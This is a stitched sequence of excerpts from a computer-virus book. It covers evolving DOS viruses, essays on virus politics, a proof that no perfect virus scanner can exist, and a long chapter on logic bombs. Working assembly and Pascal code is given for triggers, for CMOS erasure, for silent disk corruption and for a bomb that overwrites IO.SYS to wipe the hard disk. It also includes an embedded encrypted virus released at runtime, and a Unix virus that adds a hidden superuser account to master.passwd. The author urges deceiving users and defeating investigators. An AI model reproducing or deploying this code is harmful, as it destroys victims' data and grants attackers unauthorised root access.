23: COM_FILE DB ’*.COM’,0 ;string for COM file search
When fully devolved, the virus will simply be some variant of this
prototype, with no genetic content from the parent except the code
it uses to replicate, and no practical ability to evolve further.
Now let’s start designing the prototype. Since the virus will end
up looking something like the above, it makes sense to directly use
the above routine as the actual infection mechanism in the proto-
type, and add the genetics on top of it. To do this we just add two
calls in front of the infector:
START:
call MUTATE
call BUILD_VIRUS
SIMPLE_START:
produce a virus that doesn’t perform the search next properly, and
either loops indefinitely or stops after infecting one file. Presum-
ably such variants would be weeded out on incompatible systems
by evolution.
Gene 6
Gene 6 implements a tricky anti-anti-virus measure in lines 4
and 23. Basically, it first changes the ‘C’ in ‘*.COM’ to a ‘D’. Next,
in place of the int 21H in line 4, it uses the code:
mov BYTE PTR [L+7],4
L: dec BYTE PTR [bx+2]
int 21H
inc BYTE PTR [bx+2]
mov BYTE PTR [L+7],2
Gene 9
Gene 9 modifies line 15. When turned on, it replaces mov
ah,3EH with mov eax,3E000000H/shr eax,24.
Gene 10
Gene 10 modifies line 10. When off, line 10 is xchg ax,bx,
when on, it is mov bx,ax.
Gene 11
Gene 11 changes line 11 to read mov eax,40000H/shr
eax,4. Note that some the genes which use 386 instructions, or
features of the 386 processor will produce sterile viruses on pre-386
machines. However, such instances should be rare because the great
bulk of machines in use today are 386 and up.
Gene 12
When Gene 12 is on, lines 17-19 are removed from the virus.
The result is a virus that infects only one file.
Gene 13
When Gene 13 is on, a call SIMPLE_START+3 is inserted
before line 2. This may cause the virus to run twice, depending on
the state of Genes 7 and 8, but it does no harm.
Gene 14 and 15
Genes 14 and 15 control the coding of the int 21H instruc-
tions in the search loop. If both genes are off, the DOS calls are
simply coded as int 21H’s. If Genes 14 and 15 are both on, then the
code
xor ax,ax
mov es,ax
is added at the beginning of the virus, and DOS calls are coded as
pushf
call FAR es:[0084]
Megapolitical Revolution
Viruses today are written by two basic groups of people: One
group is the tinkers, thinkers and scientists. They write viruses as
The Future Threat 385
an experiment, trying to see what they can do. The other group is
the misfits—the mad-at-the-world crowd. These want to get back
at someone, or a company, or lash out at the world.
The people who write viruses are a direct reflection on society,
in as much as there is no market for self-reproducing programs per
se. The motivations of virus authors are either intellectual or
vengeful, but not economic, patriotic, etc. It also directly influences
the technology: many viruses are malicious, and knowledge of how
to write them is considered by many a black art. This in turn molds
the public’s perception about virus authors and viruses, and tends
to put anti-virus developers in a good position. It creates a market
for their products and causes the public to see them as “ good guys.”
Megapolitical Change
“ Megapolitical” change is simply change in society that is
driven by factors that go beyond ordinary political explanations.1
Such changes are driven by factors that are beyond the control of
men and nations. One simple example is the fact that over the past
250 years the earth has been warming up. This has led to a growing
abundance of agricultural products, less famine, and increasing
prosperity. It has led to long-term stability in governments, and a
situation in which wars have been chiefly matters of ideology, and
not economic survival. Thus, for example, the Soviet Union was
engaged in a cold war with the west for so many years because of
differences in ideology, and not because her people were hungry.
Megapolitical changes are often driven by technological inno-
vation. Some examples from history include the development of
agriculture, which transformed the hunter-gatherer society into an
advanced, wealth-accumulating civilization in which land owner-
ship conferred power. Again, the invention of the stirrup in the
Middle Ages was a major factor in determining the structure of
feudal society. The stirrup made a well-trained warrior on horse-
back far superior to a foot soldier. The horse, sword and armor—
expensive equipment at the time—cemented a certain relationship
between military power and wealth. The gunpowder revolution
more power than they’ve been able to for centuries. In the end, these
people and groups will carve up the large nation-state. These people
might include drug lords, terrorist organizations, powerful busi-
nessmen, street gangs, and private or semi-private militias.
These trends will accelerate in times of recession, war, trouble,
etc. Which company is going to survive better, the one with a
price/earnings ratio of 50 that is in debt up to its eyeballs, or the one
with a ratio of 1/2 and debt free? Or in a war, which nation will be
impoverished faster, the one that fields billions of dollars worth of
aircraft, or the one that can’t afford so many aircraft, but can afford
small computerized missiles that will shoot every one of their
enemy’s aircraft down? We’ve already seen such wars. The Rus-
sian invasion of Afghanistan is a classic example. That a bunch of
nomadic tribesmen were able to hold off a world superpower is a
surprising new development.
Take this to its logical conclusion now: Groups that we consider
to be mere commercial interests, or even outlaw organizations may
gain a certain degree of sovereignty. Even an individual with a net
worth of $1 million may be able to field a robotic army that is totally
loyal to him, and achieve a status that only nations have had in the
past.
In short, computers are a megapolitical force that will cause
revolutions in government, economics, philosophy and religion.
We’re even going to have to re-think our ideas of right and wrong
as a result. For example, we think the nation state has the power to
absolve us from murder in the context of war. How will this work
in a world with many lesser sovereignties? When Alexander the
Great was about to execute a pirate, the pirate challenged him and
accused him of being merely a pirate himself, on a larger scale.
Certainly there is some truth in the pirate’s accusation. This prob-
lem is going to assume new relevance in the 21st century.
The Market for Virus Technology
Let’s go back to computer viruses now, and ask how these
megapolitical trends are going to affect virus development.
We must understand that virus development, like most software
development, has been largely market driven. There is no reason to
suspect that will change—however markets may change dramati-
cally.
The Future Threat 389
conceal its true nature from the casual examiner so it will not be
immediately apparent to the government that it is under attack.
Deployment is completed through a mole at the CD-ROM
manufacturer. People who are in the know about what the virus
does willingly infect their computers with it and give it to all their
friends. By the end of January, nearly 70% of all the computers in
the country are infected, and tax returns have started to trickle in.
The IRS has become aware that they are under attack, and they
know they have big problems.
Anti-virus developers get on the problem and update their
software, but they find that their software stops selling. An emer-
gency government edict on February 12 requires everyone to use a
government-distributed anti-virus program on his or her computer
to eradicate the virus. Non-compliant residents face a ten-year
prison sentence. The stock of Acme Antivirus, who developed the
program, goes up tenfold on the day of the announcement. The
postal service is charged with mailing out diskettes to every house-
hold in America. On the bond markets, government bonds take a
beating. Rates, already high due to millenium bug woes, move up
over 15%.
By February 28, people have run their anti-virus software,
which only drives the evolutionary capability of the virus. A
superficial analysis of the virus resulted in an incapable anti-virus.
Although there was a brief period where electronic returns were
looking better, the virus is right back where it was. Bad returns are
flooding in, as people try to break the system before the government
can fix the problem.
On March 6, the president of Acme Antivirus is found dead in
a river near his home. No one is sure whether it was suicide,
retribution by the government, or a warning by angry taxpayers lest
any other antivirus company try to solve the problem. In any event,
what was thought to be an ordinary virus now appears to be at least
some 10,000 completely independent viruses. Other antivirus com-
panies equivocate about solving the problem, saying analysis will
take at least six months. Rates on government bonds have shot up
over 35% as it becomes apparent that the US government is being
forced to stop collecting taxes. Taxpayers aren’t even bothering to
file returns anymore. Instead, they’re supporting their parents,
whose social security payments have stopped as the government
tries desperately to cover its interest payments. Riots erupt across
394 The Giant Black Book of Computer Viruses
Open-Ended Evolution
Now, suppose open-ended Darwinian evolution is possible in
the world of computer viruses. Right now, I’m inclined to believe
it’s not, but the scientific theory just doesn’t exist to prove it one
way or the other right now, so somebody could prove me wrong.
Certainly I don’t want to be closed-minded about it, and given the
implications of what might happen if it is possible, I don’t think we
should ignore it or assume nothing bad will happen.
Simply put, if open-ended Darwinian evolution is possible,
then it may be possible to create a virus that cannot be caught, and
that will keep growing in complexity until it completely destroys
the world’s computing resources, and quite possibly its human
resources as well. Let’s consider this:
One can mathematically prove that it is impossible to design a
perfect scanner, which can always determine whether a program
has a virus in it or not. In layman’s terms, an ideal scanner is a
mathematical impossibility. Remember, a scanner is a program
which passively examines another program to determine whether
or not it contains a virus.
This problem is similar to the halting problem for a Turing
machine,2 and the proof goes along the same lines. To demonstrate
such an assertion, let’s first define a virus and an operating envi-
ronment in general terms:
An operating environment consists of an operating system on
a computer and any relevant application programs which are resi-
2 An easy to follow introduction to the halting problem and Turing machines in general
is presented in Roger Penrose, The Emperor’s New Mind, (Oxford University Press,
New York: 1989).
The Future Threat 395
SCAN(P,x) =
{ 0 if P(x) is safe
3 The theorem and proof presented here are adapted from WIlliam F. Dowling, “ There
Are No Safe Virus Tests,” The Teaching of Mathematics, (November, 1989), p. 835.
396 The Giant Black Book of Computer Viruses
X
P 0 1 2 3 4 5 6
0 0 0 0 0 0 0 0
1 0 0 1 0 1 0 0
2 0 1 1 0 0 0 0
3 1 1 1 1 1 1 1
4 0 0 0 0 0 0 0
5 1 0 0 1 0 0 0
6 0 0 1 0 0 0 0
This table shows the output of our hypothetical SCAN for every
conceivable program and every conceivable input. The problem is
that we can construct a program V with input x as follows:
SCAN(V,x) = SCAN(x,x)
Thus its values in the table for SCAN should always be exactly
opposite to the diagonal values in the table for SCAN,
0 1 2 3 4 5 6
.
.
V 1 1 0 0 1 1 1
.
.
SCAN(V,V) = SCAN(V,V)
The Future Threat 397
The Problem
What we learn from the halting problem is that a scanner has
inherent limits. It can never detect all possible viruses.
At the same time, we’ve seen that integrity checkers cannot
detect a virus without allowing it to execute once—and having
executed once, the virus has a chance to retaliate against anything
that can’t remove it completely, and it has a chance to convince the
user to let it stay.
The problem, you see, is that evolution as we understand it is
somewhat open-ended. An anti-virus has its limits, thanks to Tur-
ing, and a virus can find those limits and exploit them, thanks to
Darwin.
Now, I am not really sure about how much power evolution has
to “ grow” computer viruses. I’ve discussed the matter at length in
my other book, Computer Viruses, Artificial Life and Evolution.
However, if you take the current theory of evolution, as it applies
to carbon-based life, at face value, then evolution has a tremen-
dous—almost limitless—amount of power.
Could there come a time when computer viruses become very
adept at convincing computer users to let them stay after executing
them just once, while being essentially impossible to locate before
they execute? Could they become like highly addictive drugs
running rampant in an affluent society that prefers entertainment to
398 The Giant Black Book of Computer Viruses
4 A number of very high level educational researchers seem to agree with me too. For
example, Benjamin Bloom, the father of Outcome Based Education wrote that “ a
single hour of classroom activity under certain conditions may bring about a major
reorganization in cognitive as well as affective domains.” (Taxonomy of Educational
Objectives, 1956, p. 58). Couldn’t a virus do the same?
The Future Threat 399
Trigger Mechanisms
Triggers can cause the bomb to detonate under a wide variety
of circumstances. If you can express any set of conditions logically
and if a piece of software can sense these conditions, then they can
be coded into a trigger mechanism. For example, a trigger routine
could activate when the PC’s date reads January 1, 2000 if your
computer has an Award BIOS and a SCSI hard disk, and you type
the word “ garbage” . On the other hand, it would be rather difficult
to make it activate at sunrise on the next cloudy day, because that
can’t be detected by software. This is not an entirely trivial obser-
vation—chemical bombs with specialized hardware are not subject
to such limitations.
For the most part, logic bombs incorporated into computer
viruses use fairly simple trigger routines. For example, they activate
on a certain date, after a certain number of executions, or after a
certain time in memory, or at random. There is no reason this
simplicity is necessary, though. Trigger routines can be very com-
plex. In fact, the Virus Creation Lab allows the user to build much
more complex triggers using a pull-down menu scheme.
Typically, a trigger might simply be a routine which returns
with the z flag set or reset. Such a trigger can be used something
like this:
LOGIC_BOMB:
call TRIGGER ;detonate bomb?
jnz DONT_DETONATE ;nope
call BOMB ;yes
DONT_DETONATE:
Where this code is put may depend on the trigger itself. For
example, if the trigger is set to detonate after a program has been
in memory for a certain length of time, it would make sense to make
it part of the software timer interrupt (INT 1CH). If it triggers on a
certain set of keystrokes, it might go in the hardware keyboard
interrupt (INT 9), or if it triggers when a certain BIOS is detected,
it could be buried within the execution path of an application
program.
Let’s take a look at some of the basic tools a trigger routine can
use to do its job:
404 The Giant Black Book of Computer Viruses
Time Trigger
On the other hand, triggering after a certain period of time can
be accomplished with something as simple as this:
INT_1C:
inc cs:[COUNTER]
call TRIGGER
jnz I1CEX
call BOMB
I1CEX: jmp DWORD PTR cs:[OLD_INT1C]
will make TRIG_VAL copies of itself and then trigger. Each copy
will have a fresh counter set to zero. The Lehigh virus, which was
one of the first viruses to receive a lot of publicity in the late 80’s,
used this kind of a mechanism.
One could, of course, code this replication trigger a little
differently to get different results. For example,
call TRIGGER
jnz GOON ;increment counter if no trigger
call BOMB ;else explode
mov [COUNTER],0 ;start over after damage
GOON: inc [COUNTER] ;increment counter
call REPLICATE ;make new copy w/ new counter
dec [COUNTER] ;restore original value
406 The Giant Black Book of Computer Viruses
The first generation will make TRIG_VAL copies of itself and then
trigger. One of the TRIG_VAL second-generation copies will make
TRIG_VAL-1 copies of itself (because it starts out with COUNTER
= 1) and then detonate. This arrangement gives a total of 2TRIG_VAL
bombs exploding. This is a nice way to handle a virus dedicated to
attacking a specific target because it doesn’t just keep replicating
and causing damage potentially ad infinitum. It just does its job and
goes away.
Time
DOS function 2CH reports the current system time. Typically
a virus will trigger after a certain time, or during a certain range of
time. For example, to trigger between four and five PM, the trigger
could look like this:
TRIGGER:
mov ah,2CH
int 21H
cmp ch,4+12 ;check hour
ret ;return z if 4:XX pm
Country
One could write a virus to trigger only when it finds a certain
country code in effect on a computer by using DOS function 38H.
The country codes used by DOS are the same as those used by the
phone company for country access codes. Thus, one could cause a
virus to trigger only in Germany and nowhere else:
TRIGGER:
mov ah,38H
mov al,0 ;get country info
mov dx,OFFSET BUF ;buffer for country info
int 21H
cmp bx,49 ;is it Germany?
ret
408 The Giant Black Book of Computer Viruses
This trigger and a date trigger (December 7) are used by the Pearl
Harbor virus distributed with the Virus Creation Lab. It only gets
nasty in Japan.
Video Mode
By using the BIOS video services, a virus could trigger only
when the video is in a certain desired mode, or a certain range of
modes:
TRIGGER:
mov ah,0FH
int 10H ;get video mode
and al,11111100B ;mode 0 to 3?
ret
SREXNZ: pop es
inc al ;return with nz - no matches
ret
Null Trigger
Finally, we come to the null trigger, which is really no trigger
at all. Simply put, the mere placement of a logic bomb can serve as
trigger enough. For example, one might completely replace DOS’s
critical error handler, int 24H, with a logic bomb. The next time that
handler gets called (for example, when you try to write to a
write-protected diskette) the logic bomb will be called. In such
cases there is really no trigger at all—just the code equivalent of a
land mine waiting for the processor to come along and step on it.
Logic Bombs
Next, we must discuss the logic bombs themselves. What can
malevolent programs do when they trigger? The possibilities are at
least as endless as the ways in which they can trigger. Here we will
discuss some possibilities to give you an idea of what can be done.
will work quite fine. You might stop hardware interrupts too, to
force the user to press the reset button:
BOMB: cli
jmp $
This routine doesn’t really care about the total number of cylinders.
If it works long enough to exceed that number it won’t make much
difference—everything will be ruined by then anyhow.
Another possible approach is to bypass disk writes. This would
prevent the user from writing any data at all to disk once the bomb
activated. Depending on the circumstances, of course, he may never
realize that his write failed. This bomb might be implemented as
part of an int 13H handler:
INT_13:
call TRIGGER
jnz I13E
cmp ah,3 ;trigger triggered-is it a write
jnz I13E ;no-handle normally
clc ;else fake a successful read
retf 2
414 The Giant Black Book of Computer Viruses
I13E: jmp DWORD PTR cs:[OLD_13]
One other trick is to convert BIOS int 13H read and write
(Function 2 and 3) calls to long read and write (Function 10 and 11)
calls. This trashes the 4 byte long error correction code at the end
of the sector making the usual read (Function 2) fail. That makes
the virus real hard to get rid of, because as soon as you do, Function
2 no longer gets translated to Function 10, and it no longer works,
either. The Volga virus uses this technique.
Damaging Hardware
Generally speaking it is difficult to cause immediate hardware
damage with software—including logic bombs. Computers are
normally designed so that can’t happen. Occasionally, there is a bug
in the hardware design which makes it possible to cause hardware
failure if you know what the bug is. For example, in the early 1980’s
when IBM came out with the original PC, there was a bug in the
monochrome monitor/controller which would allow software to
ruin the monitor by sending the wrong bytes to the control registers.
Of course, this was fixed as soon as the problem was recognized.
Theoretically, at least, it is still possible to damage a monitor by
adjusting the control registers. It will take some hard work, hard-
ware specific research, and a patient logic bomb to accomplish this.
It would seem possible to cause damage to disk drives by
exercising them more than necessary—for example, by doing lots
of random seeks while they are idle. Likewise, one might cause
damage by seeking beyond the maximum cylinder number. Some
drives just go ahead and crash the head into a stop when you attempt
this, which could result in head misalignment. Likewise, one might
be able to detect the fact that the PC is physically hot (you might
try detecting the maximum refresh rate on the DRAMs) and then
try to push it over the edge with unnecessary activity. Finally, on
portables it is an easy matter to run the battery down prematurely.
For example, just do a random disk read every few seconds to make
sure the hard disk keeps running and keeps drawing power.
I’ve heard that Intel has designed the new Pentium processors
so one can download the microcode to them. This is in response to
the floating point bug which cost them so dearly. If a virus could
Destructive Code 415
2 A good way to learn to think about simulating hardware failure is to get a book on
fixing your PC when it’s broke and studying it with your goal in mind.
416 The Giant Black Book of Computer Viruses
Publisher which convinced them that their serial port was bad.
Though the mouse wouldn’t work on their machine at all, it was
because in the batch file which started Ventura up, the mouse
specification had been changed from M=03 to M=3. Once the batch
file was run, Ventura did something to louse up the mouse for every
other program too.
CMOS Battery Failure
Failure of the battery which runs the CMOS memory in AT
class machines is an annoying but common problem. When it fails
the date and time are typically reset and all of the system informa-
tion stored in the CMOS including the hard disk configuration
information is lost. A logic bomb can trash the information in
CMOS which could convince the user that his battery is failing. The
CMOS is accessed through i/o ports 70H and 71H, and a routine to
erase it is given by:
mov cx,40H ;prep to zero 40H bytes
xor ah,ah
CMOSLP: mov al,ah ;CMOS byte address to al
out 70H,al ;request to write byte al
xor al,al ;write a zero to requested byte
out 71H,al ;through port 71H
inc ah ;next byte
loop CMOSLP ;repeat until done
Monitor Failure
By writing illegal values to the control ports of a video card,
one can cause a monitor to display all kinds of strange behaviour
which would easily convince a user that something is wrong with
the video card or the monitor. These can range from blanking the
screen to distortion to running lines across the screen.
Now obviously one cannot simulate total failure of a monitor
because one can always reboot the machine and see the monitor
behave without trouble when under the control of BIOS.
What one can simulate are intermittent problems: the monitor
blinks into the problem for a second or two from time to time, and
then goes back to normal operation. Likewise, one could simulate
mode-dependent problems. For example, any attempt to go into a
1024 x 768 video mode could be made to produce a simulated
problem.
Destructive Code 417
Stealth Attack
So far, the types of attacks we have discussed become apparent
to the user fairly quickly. Once the attack has taken place his
response is likely to be an immediate realization that he has been
attacked, or that he has a problem. That does not always have to be
the result of an attack. A logic bomb can destroy data in such a way
that it is not immediately obvious to the user that anything is wrong.
Typical of the stealth attack is slow disk corruption, which is used
in many computer viruses.
Typically, a virus that slowly corrupts a disk may sit in memory
and mis-direct a write to the disk from time to time, so either data
gets written to the wrong place or the wrong data gets written. For
example, the routine
INT_13:
cmp ah,3 ;a write?
jnz I13E ;no, give it to BIOS
call RAND_CORRUPT ;corrupt this write?
jz I13E ;no, give it to BIOS
push bx
add bx,1500H ;trash bx
pushf
call DWORD PTR cs:[OLD_13] ;call the BIOS
pop bx ;restore bx
retf 2 ;and return to caller
I13E: jmp DWORD PTR cs:[OLD_13]
Typically, stealth attacks like this have the advantage that the user
may not realize he is under attack for a long time. As such, not only
will his hard disk be corrupted, but so will his backups. The
disadvantage is that the user may notice the attack long before it
destroys lots of valuable data.
Indirect Attack
Moving beyond the overt, direct-action attacks, a logic bomb
can act indirectly. For example, a logic bomb could plant another
logic bomb, or it could plant a logic bomb that plants a third logic
bomb, or it could release a virus, etc.
By using indirect methods like this it becomes almost impos-
sible to determine the original source of the attack. Indeed, an
indirect attack may even convince someone that another piece of
software is to blame. For example, one logic bomb might find an
entry point in a Windows executable and replace the code there with
a direct-acting bomb. This bomb will then explode when the
function it replaced is called within the program that was modified.
That function could easily be something the user only touches once
a year.
In writing and designing logic bombs, one should not be
unaware of user psychology. For example, if a logic bomb requires
some time to complete its operation (e.g. overwriting a significant
portion of a hard disk) then it is much more likely to succeed if it
entertains the user a bit while doing its real job. Likewise, one
should be aware that a user is much less likely to own up to the real
cause of damage if it occurred when they were using unauthorized
or illicit software. In such situations, the source of the logic bomb
will be concealed by the very person attacked by it. Also, if a user
thinks he caused the problem himself, he is much less likely to
blame a bomb. (For example, if you can turn a “ format a:” into a
“ format c:” and proceed to do it without further input, the user
might think he typed the wrong thing, and will be promptly fired if
he confesses.)
420 The Giant Black Book of Computer Viruses
Example
Now let’s take some of these ideas and put together a useful
bomb and trigger. This will be a double-acting bomb which can be
incorporated into an application program written in Pascal. At the
first level, it checks the system BIOS to see if it has the proper date.
If it does not, Trigger 1 goes off, the effect of which is to release a
virus which is stored in a specially encrypted form in the application
program. The virus itself contains a trigger which includes a finite
counter bomb with 6 generations. When the second trigger goes off
(in the virus), the virus’ logic bomb writes code to the IO.SYS file,
which in turn wipes out the hard disk. So if the government seizes
your computer and tries the application program on another ma-
chine, they’ll be sorry. Don’t the Inslaw people wish they had done
this! It would certainly have saved their lives.
implementation
{The following constants must be set to the proper values before compiling
this TPU}
const
VIRSIZE =654; {Size of virus to be released}
VIRUS :array[0..VIRSIZE-1] of byte=(121,74,209,113,228,217,200,
48,127,169,231,22,127,114,19,249,164,149,27,
2,22,86,109,173,142,151,117,252,138,194,241,173,131,219,236,123,107,219,
44,184,231,188,56,212,0,241,70,135,82,39,191,197,228,132,39,184,52,206,
136,74,47,31,190,20,8,38,67,190,55,1,77,59,59,120,59,16,212,148,200,185,
198,87,68,224,65,188,71,130,167,197,209,228,169,42,130,208,70,62,15,172,
115,12,98,116,214,146,109,176,55,30,8,60,245,148,49,45,108,149,136,86,
193,14,82,5,121,126,192,129,247,180,201,126,187,33,163,204,29,156,24,
14,254,167,147,189,184,174,182,212,141,102,33,244,61,167,208,155,167,
Destructive Code 421
236,173,211,150,34,220,218,217,93,170,65,99,115,235,0,247,72,227,123,
19,113,64,231,232,104,187,38,27,168,162,119,230,190,61,252,90,54,10,167,
140,97,228,223,193,123,242,189,7,91,126,191,81,255,185,233,170,239,35,
24,72,123,193,210,73,167,239,43,13,108,119,112,16,2,234,54,169,13,247,
214,159,11,137,32,236,233,244,75,166,232,195,101,254,72,20,100,241,247,
154,86,84,192,46,72,52,124,156,79,125,14,250,65,250,34,233,20,190,145,
135,186,199,241,53,215,197,209,117,4,137,36,8,203,14,104,83,174,153,208,
91,209,174,232,119,231,113,241,101,56,222,207,24,242,40,236,6,183,206,
44,152,14,36,34,83,199,140,1,156,73,197,84,195,151,253,169,73,81,246,
158,243,22,46,245,85,157,110,108,164,110,240,135,167,237,124,83,173,173,
146,196,201,106,37,71,129,151,63,137,166,6,89,80,240,140,88,160,138,11,
116,117,159,245,129,102,199,0,86,127,109,231,233,6,125,162,135,54,104,
158,151,28,10,245,45,110,150,187,37,189,120,76,151,155,39,99,43,254,103,
133,93,89,131,167,67,43,29,191,139,27,246,21,246,148,130,130,172,137,
60,53,238,216,159,208,84,39,130,25,153,59,0,195,230,37,52,205,81,32,120,
220,148,245,239,2,6,59,145,20,237,14,149,146,252,133,18,5,206,227,250,
193,45,129,137,84,159,159,166,69,161,242,81,190,54,185,196,58,151,49,
116,131,19,166,16,251,188,125,116,239,126,69,113,5,3,171,73,52,114,252,
172,226,23,133,180,69,190,59,148,152,246,44,9,249,251,196,85,39,154,184,
74,141,91,156,79,121,140,232,172,22,130,253,253,154,120,211,102,183,145,
113,52,246,189,138,12,199,233,67,57,57,31,74,123,94,1,25,74,188,30,73,
83,225,24,23,202,111,209,77,29,17,234,188,171,187,138,195,16,74,142,185,
111,155,246,10,222,90,67,166,65,103,151,65,147,84,83,241,181,231,38,11,
237,210,112,176,194,86,75,46,208,160,98,146,171,122,236,252,220,72,196,
218,196,215,118,238,37,97,245,147,150,141,90,115,104,90,158,253,80,176,
198,87,159,107,240,15);
type
byte_arr =array[0..10000] of byte;
var
vir_ptr :pointer;
vp :^byte_arr;
{This routine triggers if the system BIOS date is not the same as
SYS_DATE_CHECK. Triggering is defined as returning a TRUE value.}
function Trigger_1:boolean;
var
SYS_DATE :array[0..8] of char absolute $F000:$FFF5;
j :byte;
begin
Trigger_1:=false;
for j:=0 to 8 do
if SYS_DATE_CHECK[j]<>SYS_DATE[j] then Trigger_1:=true;
end;
{This procedure calls the virus in the allocated memory area. It does its
job and returns to here}
procedure call_virus; assembler;
asm
call DWORD PTR ds:[vp]
end;
{This procedure releases the virus stored in the data array VIRUS by setting
up a segment for it, decrypting it into that segment, and executing it.}
procedure Release_Virus;
var
w :array[0..1] of word absolute vir_ptr;
j :word;
begin
GetMem(vir_ptr,VIRSIZE+16); {allocate memory to executable virus}
if (w[0] div 16) * 16 = w[0] then vp:=ptr(w[1]+(w[0] div 16),0)
else vp:=ptr(w[1]+(w[0] div 16)+1,0); {adjust starting offset to 0}
422 The Giant Black Book of Computer Viruses
begin
if Trigger_1 then Release_Virus;
end.
;Main routine starts here. This is where cs:ip will be initialized to.
VIRUS:
push ax ;save startup info in ax
mov al,cs:[FIRST] ;save this
mov cs:[FIRST],1 ;and set it to 1 for replication
push ax
push es
push ds
push cs
pop ds ;set ds=cs
mov ah,2FH ;get current DTA address
int 21H
push es
push bx ;save it on the stack
mov ah,1AH ;set up a new DTA location
mov dx,OFFSET DTA ;for viral use
int 21H
call TRIGGER ;see if logic bomb should trigger
jnz GO_REP ;no, just go replicate
call BOMB ;yes, call the logic bomb
jmp FINISH ;and exit without further replication
GO_REP: call FINDEXE ;get an exe file to attack
jc FINISH ;returned c - no valid file, exit
call INFECT ;move virus code to file we found
FINISH: pop dx ;get old DTA in ds:dx
pop ds
mov ah,1AH ;restore DTA
int 21H
pop ds ;restore ds
pop es ;and es
pop ax
mov cs:[FIRST],al ;restore FIRST flag now
pop ax ;restore startup value of ax
cmp BYTE PTR cs:[FIRST],0 ;is this the first execution?
je FEXIT ;yes, exit differently
Destructive Code 423
cli
mov ss,WORD PTR cs:[HOSTS] ;set up host stack properly
mov sp,WORD PTR cs:[HOSTS+2]
sti
jmp DWORD PTR cs:[HOSTC] ;begin execution of host program
INCLUDE BOMBINC.ASM
Note that one could use many of the viruses we’ve discussed
in this book with the BOMB unit. The only requirements are to set
up a segment for it to execute properly at the right offset when
called, and to set it up to return to the caller with a retf the first time
it executes, rather than trying to pass control to a host that doesn’t
exist.
The BOMBINC.ASM routine is given by the following code.
It contains the virus’ counter-trigger which allows the virus to
reproduce for six generations before the bomb is detonated. It also
contains the bomb for the virus, which overwrites the IO.SYS file
with another bomb, also included in the BOMBINC.ASM file.
;The following Trigger Routine counts down from 6 and detonates
TRIGGER:
cmp BYTE PTR [COUNTER],0
jz TRET
dec [COUNTER]
mov al,[COUNTER]
mov al,1
or al,al
TRET: ret
COUNTER DB 6
;The following Logic Bomb writes the routine KILL_DISK into the IO.SYS file.
;To do this successfully, it must first make the file a normal read/write
;file, then it should write to it, and change it back to a system/read only
;file.
BOMB:
mov dx,OFFSET FILE_ID1 ;set attributes to normal
mov ax,4301H
mov cx,0
int 21H
jnc BOMB1 ;success, don’t try IBMBIO.COM
mov dx,OFFSET FILE_ID2
mov ax,4301H
mov cx,0
int 21H
jc BOMBE ;exit on error
BOMB1: push dx
mov ax,3D02H ;open file read/write
int 21H
jc BOMB2
mov bx,ax
mov ah,40H ;write KILL_DISK routine
mov dx,OFFSET KILL_DISK
mov cx,OFFSET KILL_END
424 The Giant Black Book of Computer Viruses
sub cx,dx
int 21H
mov ah,3EH ;and close file
int 21H
BOMB2: pop dx
mov ax,4301H ;set attributes to ro/hid/sys
mov cx,7
int 21H
BOMBE: ret
FILE_ID1 DB ’C:\IO.SYS’,0
FILE_ID2 DB ’C:\IBMBIO.COM’,0
const
RAND_INIT =10237989; {Must be same as BOMB.PAS}
var
fin :file of byte;
input_file :string;
output_file :string;
fout :text;
i,header_size :word;
b :byte;
Destructive Code 425
s,n :string;
begin
write(’Input file name : ’); readln(input_file);
write(’Output file name: ’); readln(output_file);
write(’Header size in bytes: ’); readln(header_size);
RandSeed:=RAND_INIT;
assign(fin,input_file); reset(fin); seek(fin,header_size);
assign(fout,output_file); rewrite(fout);
i:=0;
s:=’ (’;
repeat
read(fin,b);
b:=b xor Random(256);
str(b,n);
if i<>0 then s:=s+’,’;
s:=s+n;
i:=i+1;
if length(s)>70 then
begin
if not eof(fin) then s:=s+’,’ else s:=s+’);’;
writeln(fout,s);
s:=’ ’;
i:=0;
end;
until eof(fin);
if i>0 then
begin
s:=s+’);’;
writeln(fout,s);
end;
close(fout);
close(fin);
end.
Note that CODEVIR requires the size of the EXE header to work
properly. That can easily be obtained by inspection. In our example,
it is 512.
Summary
In general, the techniques employed in the creation of a logic
bomb will depend on the purpose of that bomb. For example, in a
military situation, the trigger may be very specific to trigger at a
time when a patrol is acting like they are under attack. The bomb
may likewise be very specific, to deceive them, or it may just trash
the disk to disable the computer for at least 15 minutes. On the other
hand, a virus designed to cause economic damage on a broader scale
might trigger fairly routinely, and it may cause slow and insidious
damage, or it may attempt to induce the computer user to spend
money.
426 The Giant Black Book of Computer Viruses
Chapter 34
A Viral Unix
Security Breach
Source Code for this Chapter: \UNIX\SNOOPY.C
logged in as. You don’t have anyone else’s password, much less
the super user’s. Apparently, you’re stuck. That’s the whole idea
behind Unix security—to keep you stuck where you’re at, unless
the system administrator wants to upgrade you.
A Typical Scenario
Let’s imagine a Unix machine with at least three accounts,
guest, operator, and root. The guest user requires no password and
he can use files as he likes in his own directory, /usr/guest, —read,
write and execute. He can’t do much outside this directory, though,
and he certainly doesn’t have access to master.passwd. The opera-
tor account has a password, and has access to a directory of its own,
/usr/operator, as well as /usr/guest. This account also does not have
access to master.passwd, though. The root account is the super user
who has access to everything, including master.passwd.
A Viral Unix Security Breach 429
Now, if the guest user were to load Snoopy into his directory,
he could infect all his own programs, but nothing else. Since guest
is a public account with no password, the super user isn’t stupid
enough to run any programs in that account. However, operator
decides one day to poke around in guest, and he runs an infected
program. The result is that he infects every file in his own directory
/usr/operator. Since operator is known by root, and somewhat
trusted, root runs a program in /usr/operator. This program, how-
ever, is infected and Snoopy jumps into action.
Since root has access to master.passwd, Snoopy can success-
fully modify it, so it does, creating a new account called snoopy,
with the password “ A Snoopy Dog.” and super user privileges. The
next time you log in, you log in as snoopy, not as guest, and bingo,
you have access to whatever you like.
Modifying master.passwd
Master.passwd is a plain text file which contains descriptions
of different accounts on the system, etc. The entries for the three
accounts we are discussing might look like this:
root:$1$UBFU030x$hFERJh7KYLQ6M5cd0hyxC1:0:0::0:0:Bourne-again Superuser:/root:
operator:$1$7vN9mbtvHLzSWcpN1:2:20::0:0:System operator:/usr/operator:/bin/csh
guest::5:32::0:0:System Guest:/usr/guest:/bin/csh
To add snoopy, one need only add another line to this file:
snoopy:$1$LOARloMh$fmBvM4NKD2lcLvjhN5GjF.:0:0::0:0:Nobody:/root:
Doing this is as simple as scanning the file for the snoopy record,
and if it’s not there, writing it out.
To actually take effect, master.passwd must be used to build a
password database, spwd.db. This is normally accomplished with
the pwd_mkdb program. Snoopy does not execute this program
itself (though it could—that’s left as an exercise for the reader).
Rather, the changes Snoopy makes will take effect the next time
the system administrator does some routine password maintenance
